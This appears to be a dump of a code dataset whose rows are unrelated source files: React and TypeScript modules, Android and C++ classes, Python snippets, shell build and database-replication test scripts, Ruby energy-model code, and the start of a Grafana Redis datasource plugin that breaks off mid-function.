text stringlengths 1 1.05M |
|---|
export { default as AnchorCell } from './AnchorCell';
export { default as ButtonCell } from './ButtonCell';
export { default as CheckboxCell } from './CheckboxCell';
export { default as LinkCell } from './LinkCell';
export { default as TableCell } from './TableCell';
|
declare const _default: (req: any, res: any) => Promise<void>;
/**
* @oas [get] /shipping-profiles/{id}
* operationId: "GetShippingProfilesProfile"
* summary: "Retrieve a Shipping Profile"
* description: "Retrieves a Shipping Profile."
* x-authenticated: true
* parameters:
* - (path) id=* {string} The id of the Shipping Profile.
* tags:
* - Shipping Profile
* responses:
* 200:
* description: OK
* content:
* application/json:
* schema:
* properties:
* shipping_profile:
* $ref: "#/components/schemas/shipping_profile"
*/
export default _default;
|
package ir.doorbash.update.downloader.broadcast;
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
import ir.doorbash.update.downloader.service.UpdateService;
import ir.doorbash.update.downloader.util.LogUtil;
import ir.doorbash.update.downloader.util.lock.CheckPowerLock;
/**
* Created by <NAME> on 3/10/16.
*/
public class ConnectivityChangeReceiver extends BroadcastReceiver {
public static final String TAG = "ConnectivityChangeReceiver";
@Override
public void onReceive(Context context, Intent intent) {
Log.d(LogUtil.TAG, "ConnectivityChangeReceiver.onReceive()");
CheckPowerLock.acquire(context);
Intent i = new Intent(context, UpdateService.class);
i.putExtra("action", UpdateService.ACTION_CHECK_NEW_VERSION);
// context.startService(i);
AlarmManager mgr = (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
mgr.set(AlarmManager.RTC, System.currentTimeMillis() + 2000, PendingIntent.getService(context, 3242, i, 0));
}
}
|
<gh_stars>1-10
import {Dimensions } from "react-native";
const h=Dimensions.get('window').height;
const w=Dimensions.get('window').width;
export default {
preview: {
flex: 1,
justifyContent: 'flex-end',
alignItems: 'center',
},
capture: {
flex: 0,
backgroundColor: '#fff',
borderRadius: 5,
padding: 15,
paddingHorizontal: 20,
alignSelf: 'center',
margin: 20,
},
container: {
backgroundColor: "#B0DAE6"
},
mb10: {
marginBottom: 10
},
step: {
top:-h*0.027,
alignItems:'center',
marginBottom: -18,
},
btns: {
alignItems:'center',
marginBottom: 10,
flex:1,
flexDirection: 'row'
},
itemBtn: {
width:w*0.32,
height:w*0.21,
// marginHorizontal:w*0.00005,
},
stepCircle: {
marginHorizontal:w*0.05,
width:w*0.09,
height:w*0.09,
borderRadius:w*0.045,
backgroundColor:'#ED882B'
},
stepText: {
fontSize: w*0.045,
color:'#fff',
textAlign: 'center',
padding:w*0.012
},
location: {
backgroundColor:'#ffffff',
padding:w*0.012,
borderRadius:w*0.03,
height:h*0.06,
},
locationText: {
fontSize: w*0.03,
color:'#5c5c5c',
padding:w*0.012
},
addText: {
fontSize: w*0.03,
color:'#3c3c3c',
padding:w*0.03
},
reportText: {
fontSize: 22,
width:350
},
textArea: {
fontSize: w*0.03,
width:w*0.91,
backgroundColor: 'white',
margin:w*0.02,
marginVertical:h*0.004,
borderRadius:12,
},
iconSize:{
fontSize:12,
color: "red"
},
bottom:{
margin:w*0.005,
// backgroundColor:'#d79a96',
flexDirection: 'row',
alignItems:'flex-end',
alignContent:'space-around'
},
bottom1: {
// alignItems:'center',
width:w*0.65,
marginBottom: 10,
},
emergency:{
width:w*0.26,
height:w*0.13,
backgroundColor:'#DED9D9',
alignItems:'center',
justifyContent:'center',
shadowColor: "#000",
shadowOffset: {
width: 0,
height: 4,
},
shadowOpacity: 0.30,
shadowRadius: 4.65,
elevation: 8,
},
priorityText: {
fontSize: w*0.03,
color:'#000',
padding:w*0.02
},
};
|
<filename>src/SnippetCompiler.ts<gh_stars>1-10
import * as tsconfig from 'tsconfig'
import * as fsExtra from 'fs-extra'
import { TSError } from 'ts-node'
import { TypeScriptRunner } from './TypeScriptRunner'
import { PackageInfo } from './PackageInfo'
import { CodeBlockExtractor } from './CodeBlockExtractor'
import { LocalImportSubstituter } from './LocalImportSubstituter'
import { CodeWrapper } from './CodeWrapper'
type CodeBlock = {
readonly file: string
readonly snippet: string
readonly sanitisedCode: string
}
export type SnippetCompilationResult = {
readonly file: string
readonly index: number
readonly snippet: string
readonly error?: TSError | Error
}
export class SnippetCompiler {
private readonly runner: TypeScriptRunner
constructor (private readonly workingDirectory: string) {
const configOptions = SnippetCompiler.loadTypeScriptConfig()
this.runner = new TypeScriptRunner(this.workingDirectory, configOptions.config)
}
private static loadTypeScriptConfig (): any {
const typeScriptConfig = tsconfig.loadSync(process.cwd())
if (typeScriptConfig?.config?.compilerOptions) {
typeScriptConfig.config.compilerOptions.noUnusedLocals = false
}
return typeScriptConfig
}
async compileSnippets (documentationFiles: string[]): Promise<SnippetCompilationResult[]> {
try {
await this.cleanWorkingDirectory()
await fsExtra.ensureDir(this.workingDirectory)
const examples = await this.extractAllCodeBlocks(documentationFiles)
return await Promise.all(
examples.map(async (example, index) => await this.testCodeCompilation(example, index))
)
} finally {
await this.cleanWorkingDirectory()
}
}
private async cleanWorkingDirectory () {
return await fsExtra.remove(this.workingDirectory)
}
private async extractAllCodeBlocks (documentationFiles: string[]) {
const packageDefn = await PackageInfo.read()
const importSubstituter = new LocalImportSubstituter(packageDefn)
const codeBlocks = await Promise.all(documentationFiles.map(async (file) => await this.extractFileCodeBlocks(file, importSubstituter)))
return codeBlocks.flat()
}
private async extractFileCodeBlocks (file: string, importSubstituter: LocalImportSubstituter): Promise<CodeBlock[]> {
const blocks = await CodeBlockExtractor.extract(file)
return blocks.map((block: string) => {
return {
file,
snippet: block,
sanitisedCode: this.sanitiseCodeBlock(importSubstituter, block)
}
})
}
private sanitiseCodeBlock (importSubstituter: LocalImportSubstituter, block: string): string {
const localisedBlock = importSubstituter.substituteLocalPackageImports(block)
return CodeWrapper.wrap(localisedBlock)
}
private async testCodeCompilation (example: CodeBlock, index: number): Promise<SnippetCompilationResult> {
try {
await this.runner.run(example.sanitisedCode)
return {
snippet: example.snippet,
file: example.file,
index: index + 1
}
} catch (error) {
const wrappedError = error instanceof Error ? error : new Error(String(error))
return {
snippet: example.snippet,
error: wrappedError,
file: example.file,
index: index + 1
}
}
}
}
|
import random
randomNumber = random.random()
print(randomNumber) |
def sum_array(A, N):
result = 0
for i in range(N):
result += A[i]
return result |
<filename>open-sphere-base/core/src/main/java/net/opengis/cat/csw/_202/GetCapabilitiesType.java
//
// This file was generated by the JavaTM Architecture for XML Binding(JAXB) Reference Implementation, vJAXB 2.1.10 in JDK 6
// See <a href="http://java.sun.com/xml/jaxb">http://java.sun.com/xml/jaxb</a>
// Any modifications to this file will be lost upon recompilation of the source schema.
// Generated on: 2010.01.22 at 02:23:57 PM MST
//
package net.opengis.cat.csw._202;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAttribute;
import javax.xml.bind.annotation.XmlType;
/**
*
* Request for a description of service capabilities. See OGC 05-008
* for more information.
*
*
* <p>Java class for GetCapabilitiesType complex type.
*
* <p>The following schema fragment specifies the expected content contained within this class.
*
* <pre>
* <complexType name="GetCapabilitiesType">
* <complexContent>
* <extension base="{http://www.opengis.net/ows}GetCapabilitiesType">
* <attribute name="service" type="{http://www.opengis.net/ows}ServiceType" default="http://www.opengis.net/cat/csw" />
* </extension>
* </complexContent>
* </complexType>
* </pre>
*
*
*/
@XmlAccessorType(XmlAccessType.FIELD)
@XmlType(name = "GetCapabilitiesType")
public class GetCapabilitiesType
extends net.opengis.ows._100.GetCapabilitiesType
{
@XmlAttribute
protected String service;
/**
* Gets the value of the service property.
*
* @return
* possible object is
* {@link String }
*
*/
public String getService() {
if (service == null) {
return "http://www.opengis.net/cat/csw";
} else {
return service;
}
}
/**
* Sets the value of the service property.
*
* @param value
* allowed object is
* {@link String }
*
*/
public void setService(String value) {
this.service = value;
}
}
|
#!/bin/bash
cd ../../
if [ "$1" == "--clean" ]
then
echo "Running clean..."
flutter clean
else
echo "Skipping clean..."
fi
if [ "$1" == "--apk" ]
then
echo "Building APK..."
flutter build apk --release
else
echo "Building AAB..."
flutter build appbundle --release
fi |
#include <map>
#include <string>
// Element class representing an element in the priority queue
class Element {
public:
Element(const std::string& id, int priority) : id_(id), priority_(priority) {}
const std::string& GetId() const { return id_; }
int GetPriority() const { return priority_; }
private:
std::string id_;
int priority_;
};
// Priority queue class implementing a priority queue using a map
class PriorityQueue {
public:
// Add a new element to the priority queue
void AddElement(const Element& element) {
auto it = elements_.find(element.GetId());
if (it != elements_.end()) {
if (it->second->GetPriority() < element.GetPriority()) {
delete it->second;
elements_.erase(it);
addEntry = true;
} else {
addEntry = false;
}
} else {
addEntry = true;
}
if (addEntry) {
elements_[element.GetId()] = new Element(element);
}
}
// Remove and return the element with the highest priority
Element RemoveHighestPriorityElement() {
if (elements_.empty()) {
throw std::out_of_range("Priority queue is empty");
}
auto it = elements_.begin();
for (auto iter = std::next(elements_.begin()); iter != elements_.end(); ++iter) {
if (iter->second->GetPriority() > it->second->GetPriority()) {
it = iter;
}
}
Element highestPriorityElement = *(it->second);
delete it->second;
elements_.erase(it);
return highestPriorityElement;
}
private:
std::map<std::string, Element*> elements_;
bool addEntry;
}; |
#include <iostream>
#include <string>
#include <thread>
#include "mmv.hpp"
void input_thread(MMV &mmv)
{
while (mmv.io.is_alive()) {
std::string token;
std::cin>>token;
if (token == "KEY_CL") mmv.io.push_key(KEY_CL);
if (token == "KEY_POS") mmv.io.push_key(KEY_POS);
if (token == "KEY_MEM") mmv.io.push_key(KEY_MEM);
if (token == "KEY_INFO") mmv.io.push_key(KEY_INFO);
if (token == "KEY_LEV") mmv.io.push_key(KEY_LEV);
if (token == "KEY_ENT") mmv.io.push_key(KEY_ENT);
if (token == "KEY_RIGHT") mmv.io.push_key(KEY_RIGHT);
if (token == "KEY_LEFT") mmv.io.push_key(KEY_LEFT);
if (token == "KEY_A1") mmv.io.push_key(KEY_A1);
if (token == "KEY_B2") mmv.io.push_key(KEY_B2);
if (token == "KEY_C3") mmv.io.push_key(KEY_C3);
if (token == "KEY_D4") mmv.io.push_key(KEY_D4);
if (token == "KEY_E5") mmv.io.push_key(KEY_E5);
if (token == "KEY_F6") mmv.io.push_key(KEY_F6);
if (token == "KEY_G7") mmv.io.push_key(KEY_G7);
if (token == "KEY_H8") mmv.io.push_key(KEY_H8);
}
}
int main(int argc, const char *argv[])
{
MMV mmv;
const char *rom_filename = "mephisto5.rom";
if (!mmv.load(rom_filename)) {
std::cout<<"failed to load file: "<<rom_filename<<std::endl;
return 1;
}
std::thread inp_th(input_thread, std::ref(mmv));
mmv.run();
inp_th.join();
return 0;
}
|
<filename>temp_old/ui.py
"""Use lamp_setup_app.py to calibrate all labware first
If you need to control gpios, first stop the robot server with systemctl stop opentrons-robot-server. Until you restart the server with systemctl start opentrons-robot-server, you will be unable to control the robot using the Opentrons app.
"""
def choose_protocol(protocols_dic):
"""
print out currently protocols.
"""
s="Currently these protocols are available:\n"
for k in protocols_dic.keys():
s+="{}: {} \n".format(k,protocols_dic[k])
s += "Please choose the protocols to run (e.g. 1) \n Other inputs will leads to error \n"
to_do = int(input(s))
if to_do == 1:
import ams_protocols.saliva_to_dtt as prot
return prot
elif to_do ==2:
import ams_protocols.sample_to_lamp_96well as prot
return prot
def confirm_deckplan(deck_plan):
s="Check the deck plan:\n"
for k in deck_plan.keys():
v= deck_plan[k]
if v != None:
s+="{}: {} \n".format(k,v)
s += "Please confirm the deck_plan \n Enter 'y' to start the run \n Enter 'e' to exit\n"
to_run = input(s)
return to_run
sample_info={
"samples":48,
"sample_per_column":8,
"replicates":2,
"total_batch":1,
"start_batch":1,
}
transfer_param={
"samp_vol":5,
"air_vol": 0,
"disp":1,
"asp_bottom":0,
"disp_bottom":0,
'mix':0,
"get_time":1,
'dry_run':False,
"aspirate_rate": 7.6,
"dispense_rate": 7.6,
"tip_press_increment":0.3,
"tip_presses" : 1,
}
protocols_dic = {
1:"Saliva to DTT",
2:"Sample to LAMP",}
prot = choose_protocol(protocols_dic)
to_run = ""
while to_run !="y":
deck_plan=prot.initialize_robot()
to_run = confirm_deckplan(deck_plan)
if to_run in 'yY':
prot.run(**sample_info,**transfer_param)
break
elif to_run == 'e':
print ("Exited")
break
# prot.run()
# print_available_protocols()
|
#!/usr/bin/env bash
set -x
set -e
DLNAME=V1_01_easy
wget http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room1/$DLNAME/$DLNAME.zip
unzip -d $DLNAME $DLNAME.zip
rm $DLNAME.zip
rm -rf $DLNAME/__MACOSX
chmod -R go-w $DLNAME
|
def mean(lst):
return sum(lst) / len(lst)
def std_dev(lst):
avg = mean(lst)
variance = 0
for num in lst:
variance += (num - avg)**2
variance /= len(lst)
return variance**0.5
# Driver Code
lst = [5, 7, 10, 8, 6]
print("Mean: ", mean(lst))
print("Standard Deviation: ", std_dev(lst)) |
#!/bin/sh
set -eu
thispath=`perl -MCwd=realpath -le'print(realpath(\$ARGV[0]))' -- "${0}"`
if [ -d "${thispath%*.sh}" ]; then
dir=${thispath%*.sh}
else
dir=${thispath%/*}/target
fi
. "${dir}/config.inc.sh"
PATH="${JAVA_HOME}/bin:${PATH}" CLASSPATH="${dir}/classes:`cat "${dir}/mdep.classpath"`" \
exec java org.openjdk.nashorn.tools.Shell -strict "${thispath%/*}/totp.js" -- "$@"
|
module IntuitOAuth
class Config
DISCOVERY_URL_SANDBOX = 'https://developer.intuit.com/.well-known/openid_sandbox_configuration/'
DISCOVERY_URL_PROD = 'https://developer.intuit.com/.well-known/openid_configuration/'
MIGRATION_URL_SANDBOX = 'https://developer-sandbox.api.intuit.com/v2/oauth2/tokens/migrate'
MIGRATION_URL_PROD = 'https://developer.api.intuit.com/v2/oauth2/tokens/migrate'
end
class Scopes
ACCOUNTING = 'com.intuit.quickbooks.accounting'
PAYMENTS = 'com.intuit.quickbooks.payment'
OPENID = 'openid'
PROFILE = 'profile'
EMAIL = 'email'
PHONE = 'phone'
ADDRESS = 'address'
# whitelisted BETA apps only
PAYROLL = 'com.intuit.quickbooks.payroll'
PAYROLL_TIMETRACKING = 'com.intuit.quickbooks.payroll.timetracking'
PAYROLL_BENEFITS = 'com.intuit.quickbooks.payroll.benefits'
end
class Version
VERSION = '0.0.1'
USER_AGENT = "Intuit-OAuthClient-Ruby#{VERSION}-#{RUBY_PLATFORM}"
end
end
|
import tweepy
# Replace the API_KEY and API_SECRET with your application's key and secret.
auth = tweepy.AppAuthHandler(API_KEY, API_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
# Replace the hashtag with your hashtag of interest.
hashtag = '#100DaysOfCode'
# Fetch the tweets
tweets = tweepy.Cursor(api.search, q=hashtag, lang="en").items()
# Print out the tweets
for tweet in tweets:
print(tweet.text) |
#!/usr/bin/env bash
#
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#
export oozie_conf_dir=$1
export oozie_examples_dir=$2
export hadoop_conf_dir=$3
export QUEUE=$4
function getValueFromField {
xmllint $1 | grep "<name>$2</name>" -C 2 | grep '<value>' | cut -d ">" -f2 | cut -d "<" -f1
return $?
}
export JOBTRACKER=`getValueFromField ${hadoop_conf_dir}/yarn-site.xml yarn.resourcemanager.address`
export NAMENODE=`getValueFromField ${hadoop_conf_dir}/core-site.xml fs.defaultFS`
cd $oozie_examples_dir
/var/lib/ambari-agent/ambari-sudo.sh tar -zxf oozie-examples.tar.gz
/var/lib/ambari-agent/ambari-sudo.sh chmod -R o+rx examples
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|nameNode=hdfs://localhost:8020|nameNode=$NAMENODE|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|nameNode=hdfs://localhost:9000|nameNode=$NAMENODE|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|jobTracker=localhost:8021|jobTracker=$JOBTRACKER|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|jobTracker=localhost:9001|jobTracker=$JOBTRACKER|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|jobTracker=localhost:8032|jobTracker=$JOBTRACKER|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|queueName=default|queueName=$QUEUE|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|oozie.wf.application.path=hdfs://localhost:9000|oozie.wf.application.path=$NAMENODE|g" examples/apps/map-reduce/job.properties
|
class CustomError extends Error {
constructor(
message = 'An unknown error has occurred',
responseCode = 550,
...parameters
) {
super(...parameters);
Error.captureStackTrace(this, CustomError);
this.message = message;
this.responseCode = responseCode;
}
}
module.exports = CustomError;
|
<reponame>zeeskhan1990/proto
const basePallette = {
alert:'#d83b01',
alertBackground:'#deecf9',
black:'#000000',
blackTranslucent40:'rgba(0,0,0,.4)',
blue:'#0078d7',
blueDark:'#002050',
blueLight:'#00bcf2',
blueMid:'#00188f',
error:'#a80000',
errorBackground:'#fde7e9',
green:'#107c10',
greenDark:'#004b1c',
greenLight:'#bad80a',
info:'#107c10',
infoBackground:'#f4f4f4',
magenta:'#b4009e',
magentaDark:'#5c005c',
magentaLight:'#e3008c',
orange:'#d83b01',
orangeLight:'#ff8c00',
orangeLighter:'#ea4300',
purple:'#5c2d91',
purpleDark:'#32145a',
purpleLight:'#b4a0ff',
red:'#e81123',
redDark:'#a80000',
success:'#107c10',
successBackground:'#dff6dd',
teal:'#008272',
tealDark:'#004b50',
tealLight:'#00b294',
white:'#ffffff',
whiteTranslucent40:'rgba(255,255,255,.4)',
yellow:'#ffb900',
yellowLight:'#fff100'
}
export const defaultPalette = {
...basePallette,
themeDarker: '#004578',
themeDark: '#005a9e',
themeDarkAlt: '#106ebe',
themePrimary: '#0078d7',
themeSecondary: '#2b88d8',
themeTertiary: '#71afe5',
themeLight:'#c7e0f4',
themeLighter:'#deecf9',
themeLighterAlt:'#eff6fc',
neutralDark:'#212121',
neutralPrimary:'#333333',
neutralSecondary:'#666666',
neutralSecondaryAlt:'#767676',
neutralTertiary:'#a6a6a6',
neutralTertiaryAlt:'#c8c8c8',
neutralQuaternary:'#d0d0d0',
neutralQuaternaryAlt:'#dadada',
neutralLight:'#eaeaea',
neutralLighter:'#f4f4f4',
neutralLighterAlt:'#f8f8f8'
}
export const azurePalette = {
...defaultPalette,
themePrimary: '#71B1D1',
neutralPrimary: '#343A41'
} |
#! /bin/sh
. ../env.sh
mkdir -p log pid conf
./zstop.sh
v=
v=-v
v=-q
cleardb() {
echo "Clearing database $1"
psql -q -d $1 -c '
set client_min_messages=warning;
drop schema if exists londiste cascade;
drop schema if exists pgq_ext cascade;
drop schema if exists pgq_node cascade;
drop schema if exists pgq cascade;
drop table if exists mytable;
drop table if exists footable;
drop sequence if exists footable_id_seq;
'
}
run() {
echo "$ $*"
"$@"
}
msg() {
echo "##"
echo "## $*"
echo "##"
}
db_list="db1 db2 db3 db4"
echo " * create configs * "
# create ticker conf
for db in $db_list; do
cat > conf/ticker_$db.ini << EOF
[pgqadm]
job_name = ticker_$db
db = dbname=$db
logfile = log/%(job_name)s.log
pidfile = pid/%(job_name)s.pid
EOF
done
# londiste configs
for db in $db_list; do
cat > conf/londiste_$db.ini << EOF
[londiste]
job_name = londiste_$db
db = dbname=$db
queue_name = replika
logfile = log/%(job_name)s.log
pidfile = pid/%(job_name)s.pid
EOF
done
for db in $db_list; do
cleardb $db
done
echo "clean logs"
rm -f log/*.log
set -e
msg "Basic config"
run cat conf/ticker_db1.ini
run cat conf/londiste_db1.ini
msg "Install PgQ and run ticker on each db"
for db in $db_list; do
run pgqadm $v conf/ticker_$db.ini install
done
for db in $db_list; do
run pgqadm $v -d conf/ticker_$db.ini ticker
done
msg "Install Londiste and initialize nodes"
run londiste $v conf/londiste_db1.ini create-root node1 'dbname=db1'
run londiste $v conf/londiste_db2.ini create-branch node2 'dbname=db2' --provider='dbname=db1'
run londiste $v conf/londiste_db3.ini create-branch node3 'dbname=db3' --provider='dbname=db1'
run londiste $v conf/londiste_db4.ini create-leaf node4 'dbname=db4' --provider='dbname=db2'
msg "See topology"
run londiste $v conf/londiste_db4.ini status
msg "Run Londiste daemon for each node"
for db in $db_list; do
run londiste $v -d conf/londiste_$db.ini replay
done
msg "Create table on root node and fill couple of rows"
run psql -d db1 -c "create table mytable (id int4 primary key, data text)"
for n in 1 2 3 4; do
run psql -d db1 -c "insert into mytable values ($n, 'row$n')"
done
msg "Register table on root node"
run londiste $v conf/londiste_db1.ini add-table mytable
msg "Register table on other node with creation"
for db in db2 db3 db4; do
run londiste $v conf/londiste_$db.ini add-table mytable --create
done
run sleep 20
msg "Add column on root"
run cat ddl.sql
run londiste $v conf/londiste_db1.ini execute ddl.sql
msg "Insert data into new column"
for n in 5 6 7 8; do
run psql -d db1 -c "insert into mytable values ($n, 'row$n', 'data2')"
done
msg "Wait a bit"
run sleep 20
run psql -d db3 -c '\d mytable'
run psql -d db3 -c 'select * from mytable'
run sleep 10
./zcheck.sh
msg "Change topology"
run londiste $v conf/londiste_db1.ini status
run londiste $v conf/londiste_db3.ini change-provider --provider=node1
run londiste $v conf/londiste_db1.ini status
run londiste $v conf/londiste_db1.ini switchover --target=node2
run londiste $v conf/londiste_db1.ini status
run sleep 10
./zcheck.sh
|
#!/usr/bin/env sh
set -euo pipefail
cd $XCS_PRIMARY_REPO_DIR
sh Scripts/analyze.sh iOS
sh Scripts/upload.sh
|
<gh_stars>1-10
# frozen_string_literal: true
module Qernel
module Reconciliation
# Electrolysers are a special-case producer whose load profile is based on
# the electricity output by another node.
#
# The electricity node is expected to be the only input to the electrolyser,
# and will have a second electricity output to a curtailment node.
#
# [ Electrolyser ] <-
# [ Electricity Producer ]
# [ Curtailment ] <--
#
# The load profile is based on the electricity profile of the input
# producer, limited by the efficiency and capacity of the electrolyser. From
# the resulting profile, the demand and full load hours can be calculated,
# and the share of curtailment updated.
class ElectrolyserAdapter < ProducerAdapter
def initialize(*)
super
@producer = @node.input(:electricity).edges.first.rgt_node
output_conversion_name = @context.carrier_named('%s_output_conversion')
# Capacity needs to be calculated early, as number_of_units requires
# demand to be present; this varies based on demand.
@carrier_capacity =
@node.node_api.input_capacity *
@node.node_api.public_send(output_conversion_name) *
@node.node_api.number_of_units
# Pre-compute electricity while demand is set on the node.
max_available_electricity
setup(phase: demand_phase)
end
# Public: Capacity-limited demand curve describing the amount of
# electricity converted to - and output as - carrier energy.
def demand_curve
@demand_curve ||= begin
unlimited_carrier_curve.map do |value|
value < @carrier_capacity ? value : @carrier_capacity
end
end
end
def before_graph_recalculation!
return if carrier_demand.zero?
@node.demand =
carrier_demand / @node.output(@context.carrier).conversion
@node[:full_load_hours] =
carrier_demand / (@carrier_capacity * 3600)
electricity_h2_share = @node.demand / max_available_electricity
# Set share explicitly to 1.0 when the producer -> electrolyser share is
# very close to 1.0 (floating point errors).
@node.input(:electricity).edges.first.share =
(1 - electricity_h2_share).abs < 1e-4 ? 1.0 : electricity_h2_share
end
private
def demand_phase
:manual
end
# Internal: The maximum amount of electricity available for conversion to
# the carrier.
#
# Returns a Float.
def max_available_electricity
@max_available_electricity ||=
@producer.demand * @producer.output(:electricity).conversion
end
# Internal: The maximum amount of carrier energy which may be emitted by
# the electrolyser assuming no curtailment and unlimited output capacity.
#
# Returns a Float.
def max_carrier_production
max_available_electricity * @node.output(@context.carrier).conversion
end
# Internal: Curve representing the maximum amount of carrier energy that
# may be produced in each hour, assuming no electricity is curtailed, and
# unlimited output capacity of the carrier conversion.
#
# Returns a Merit::Curve.
def unlimited_carrier_curve
demand_profile * max_carrier_production
end
# Internal: The total demand of the producer is determined with the
# capacity-limited demand curve.
#
# Returns a Float.
def calculate_carrier_demand
demand_curve.sum * 3600
end
# Internal: Amplified dynamic profiles must use the electricity producer
# FLH, as the electrolyser FLH may not be correct prior to calculating.
#
# Returns a numeric.
def full_load_hours
@producer.node_api.full_load_hours
end
end
end
end
|
from django.db import models
# Create your models here.
class Ad(models.Model):
title = models.CharField(max_length=200)
description = models.TextField()
price = models.DecimalField(max_digits=10, decimal_places=2)
location = models.CharField(max_length=100)
def str(self):
return self.title |
/*
*
*/
package net.community.chest.swing.component.spinner;
import javax.swing.JSpinner;
import javax.swing.SpinnerModel;
import net.community.chest.dom.DOMUtils;
import net.community.chest.dom.proxy.XmlProxyConvertible;
import net.community.chest.dom.transform.XmlConvertible;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
/**
* <P>Copyright GPLv2</P>
*
* @author <NAME>.
* @since Mar 11, 2009 11:26:46 AM
*
*/
public class BaseSpinner extends JSpinner implements XmlConvertible<BaseSpinner> {
/**
*
*/
private static final long serialVersionUID = 9108163768497244843L;
public BaseSpinner (SpinnerModel model)
{
super(model);
}
public BaseSpinner ()
{
this(new BaseSpinnerNumberModel());
}
protected XmlProxyConvertible<?> getSpinnerConverter (Element elem)
{
return (null == elem) ? null : JSpinnerReflectiveProxy.SPINNER;
}
/*
* @see net.community.chest.dom.transform.XmlConvertible#fromXml(org.w3c.dom.Element)
*/
@Override
public BaseSpinner fromXml (Element elem) throws Exception
{
final XmlProxyConvertible<?> proxy=getSpinnerConverter(elem);
@SuppressWarnings("unchecked")
final Object o=
(null == proxy) ? this : ((XmlProxyConvertible<Object>) proxy).fromXml(this, elem);
if (o != this)
throw new IllegalStateException("fromXml(" + DOMUtils.toString(elem) + ") mismatched instances");
return this;
}
public BaseSpinner (Element elem) throws Exception
{
final Object o=fromXml(elem);
if (o != this)
throw new IllegalStateException("<init>(" + DOMUtils.toString(elem) + ") mismatched instances");
}
/*
* @see net.community.chest.dom.transform.XmlConvertible#toXml(org.w3c.dom.Document)
*/
@Override
public Element toXml (Document doc) throws Exception
{
throw new UnsupportedOperationException("toXml() N/A");
}
}
|
#!/bin/sh
echo Running "nilqed/jfricas:latest"
echo Use docker commit if you want to save your changes!
echo Warning: using xhost local:root
xhost local:root
docker run -ti --network=host --env DISPLAY=$DISPLAY nilqed/jfricas:latest jupyter notebook --no-browser --allow-root
docker ps -a
xhost -local:root
echo done.
|
function multiplyDecimals(a, b) {
return parseFloat((a * b).toFixed(4));
} |
/**
* @author mconway
* Exception hierarchy for state machine
*/
package org.angrygoat.domainmachine.exception; |
package main
import (
"context"
"crypto/tls"
"crypto/x509"
"encoding/json"
"fmt"
"strings"
"time"
"github.com/grafana/grafana-plugin-sdk-go/backend"
"github.com/grafana/grafana-plugin-sdk-go/backend/datasource"
"github.com/grafana/grafana-plugin-sdk-go/backend/instancemgmt"
"github.com/grafana/grafana-plugin-sdk-go/backend/log"
"github.com/mediocregopher/radix/v3"
)
/**
* The function is called when the instance is created for the first time or when a datasource configuration changed.
*/
func newDatasource() datasource.ServeOpts {
im := datasource.NewInstanceManager(newDataSourceInstance)
ds := &redisDatasource{
im: im,
}
// Returns datasource.ServeOpts
return datasource.ServeOpts{
QueryDataHandler: ds,
CheckHealthHandler: ds,
}
}
/**
* QueryData handles multiple queries and returns multiple responses.
* req contains the queries []DataQuery (where each query contains RefID as a unique identifer).
* The QueryDataResponse contains a map of RefID to the response for each query, and each response contains Frames ([]*Frame).
*/
func (ds *redisDatasource) QueryData(ctx context.Context, req *backend.QueryDataRequest) (*backend.QueryDataResponse, error) {
log.DefaultLogger.Debug("QueryData", "request", req)
// Get Instance
client, err := ds.getInstance(req.PluginContext)
if err != nil {
return nil, err
}
// Create response struct
response := backend.NewQueryDataResponse()
// Loop over queries and execute them individually
for _, q := range req.Queries {
res := ds.query(ctx, q, client)
// save the response in a hashmap based on with RefID as identifier
response.Responses[q.RefID] = res
}
return response, nil
}
/**
* CheckHealth handles health checks sent from Grafana to the plugin
*
* @see https://redis.io/commands/ping
*/
func (ds *redisDatasource) CheckHealth(ctx context.Context, req *backend.CheckHealthRequest) (*backend.CheckHealthResult, error) {
var status backend.HealthStatus
message := "Data Source health is yet to become known."
// Get Instance
client, err := ds.getInstance(req.PluginContext)
if err != nil {
status = backend.HealthStatusError
message = fmt.Sprintf("getInstance error: %s", err.Error())
} else {
err = client.Do(radix.Cmd(&message, "PING"))
// Check errors
if err != nil {
status = backend.HealthStatusError
message = fmt.Sprintf("PING command failed: %s", err.Error())
} else {
status = backend.HealthStatusOk
message = "Data Source is working as expected."
}
}
// Return Health result
return &backend.CheckHealthResult{
Status: status,
Message: message,
}, nil
}
/**
* Return Instance
*/
func (ds *redisDatasource) getInstance(ctx backend.PluginContext) (ClientInterface, error) {
s, err := ds.im.Get(ctx)
if err != nil {
return nil, err
}
// Return client
return s.(*instanceSettings).client, nil
}
/**
* New Datasource Instance
*
* @see https://github.com/mediocregopher/radix
*/
func newDataSourceInstance(setting backend.DataSourceInstanceSettings) (instancemgmt.Instance, error) {
var jsonData dataModel
// Unmarshal Configuration
var dataError = json.Unmarshal(setting.JSONData, &jsonData)
if dataError != nil {
log.DefaultLogger.Error("JSONData", "Error", dataError)
return nil, dataError
}
// Debug
log.DefaultLogger.Debug("JSONData", "Values", jsonData)
// Pool size
poolSize := 5
if jsonData.PoolSize > 0 {
